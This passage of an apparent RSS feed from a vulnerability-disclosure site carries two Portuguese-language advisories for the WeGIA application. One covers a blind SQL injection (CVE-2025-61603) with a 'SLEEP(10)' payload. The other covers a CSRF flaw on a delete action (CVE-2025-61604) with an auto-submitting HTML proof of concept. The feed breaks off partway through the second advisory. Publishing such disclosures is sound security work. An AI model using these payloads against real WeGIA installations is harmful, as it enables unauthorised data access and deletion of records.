&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/pet/profile_pet.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-61603-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id_pet-do-endpoint-petprofile_petphp&amp;#34;&amp;gt;CVE-2025-61603: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/pet/profile_pet.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61603&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61603&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/pet/profile_pet.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/pet/profile_pet.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&#43;AND&#43;SLEEP(10)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61603/image.png&amp;#34;
	width=&amp;#34;1531&amp;#34;
	height=&amp;#34;708&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61603/image_hu_d3891178922f3b57.png 480w, /p/cve-2025-61603/image_hu_9215cc27c0e46de.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;518px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8963-9833-gpx7&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8963-9833-gpx7&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 02 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-61604</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-61604/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-61604/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-61604-cross-site-request-forgery-csrf-na-exclusão-get-da-classe-almoxarifadocontrole-no-endpoint-controlphp&amp;#34;&amp;gt;CVE-2025-61604: Cross-Site Request Forgery (CSRF) na exclusão (GET) da classe &amp;lt;code&amp;gt;AlmoxarifadoControle&amp;lt;/code&amp;gt; no endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61604&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61604&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) foi identificada no aplicativo WeGIA. A operação de exclusão da entidade &amp;lt;code&amp;gt;Almoxarifado&amp;lt;/code&amp;gt; é exposta via &amp;lt;code&amp;gt;HTTP GET&amp;lt;/code&amp;gt; sem proteção CSRF, permitindo que um site de terceiros acione a ação usando a sessão autenticada da vítima.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;GET /WeGIA/controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;metodo&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nomeClasse&amp;lt;/code&amp;gt; e ​​&amp;lt;code&amp;gt;id_almoxarifado&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-61604-cross-site-request-forgery-csrf-na-exclusão-get-da-classe-almoxarifadocontrole-no-endpoint-controlphp&amp;#34;&amp;gt;CVE-2025-61604: Cross-Site Request Forgery (CSRF) na exclusão (GET) da classe &amp;lt;code&amp;gt;AlmoxarifadoControle&amp;lt;/code&amp;gt; no endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61604&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61604&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) foi identificada no aplicativo WeGIA. A operação de exclusão da entidade &amp;lt;code&amp;gt;Almoxarifado&amp;lt;/code&amp;gt; é exposta via &amp;lt;code&amp;gt;HTTP GET&amp;lt;/code&amp;gt; sem proteção CSRF, permitindo que um site de terceiros acione a ação usando a sessão autenticada da vítima.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;GET /WeGIA/controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;metodo&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nomeClasse&amp;lt;/code&amp;gt; e ​​&amp;lt;code&amp;gt;id_almoxarifado&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61604/image.png&amp;#34;
	width=&amp;#34;1498&amp;#34;
	height=&amp;#34;644&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61604/image_hu_f5b0e3c8457f44d8.png 480w, /p/cve-2025-61604/image_hu_a02351acbaeffe3e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;232&amp;#34;
		data-flex-basis=&amp;#34;558px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61604/image-1.png&amp;#34;
	width=&amp;#34;775&amp;#34;
	height=&amp;#34;456&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61604/image-1_hu_fe77fb317ebe37c3.png 480w, /p/cve-2025-61604/image-1_hu_443e426826577324.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;169&amp;#34;
		data-flex-basis=&amp;#34;407px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Navegação de nível superior (funciona mesmo com SameSite=Lax)&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Hospede o arquivo abaixo de uma origem diferente e abra-o enquanto estiver conectado ao WeGIA (ex: &amp;lt;code&amp;gt;poc_csrf_get.html&amp;lt;/code&amp;gt;):&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cp&amp;#34;&amp;gt;&amp;amp;lt;!doctype html&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;html&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;body&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;form&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;id&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;f&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;method&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;GET&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;action&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;https://sec.wegia.org:8000/WeGIA/controle/control.php&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;target&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;_self&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;      &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;input&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;type&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;hidden&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;metodo&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;value&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;excluir&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;      &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;input&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;type&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;hidden&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;nomeClasse&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;value&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;AlmoxarifadoControle&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;      &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;input&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;type&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;hidden&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;id_almoxarifado&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;value&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;{choose a ID}&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;form&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;getElementById&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;f&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;).&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;submit&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;();&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;body&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;html&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;etapas-para-reproduzir&amp;#34;&amp;gt;Etapas para Reproduzir:
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Faça login no WeGIA com um usuário autorizado a excluir &amp;lt;code&amp;gt;Almoxarifado&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;De outra origem (por exemplo, &amp;lt;code&amp;gt;http://127.0.0.1:8008&amp;lt;/code&amp;gt;), abra o HTML PoC acima.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Observe o WeGIA executando o fluxo de exclusão (por exemplo, erro de FK ou exclusão normal), comprovando que uma solicitação entre sites pode acionar a ação.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
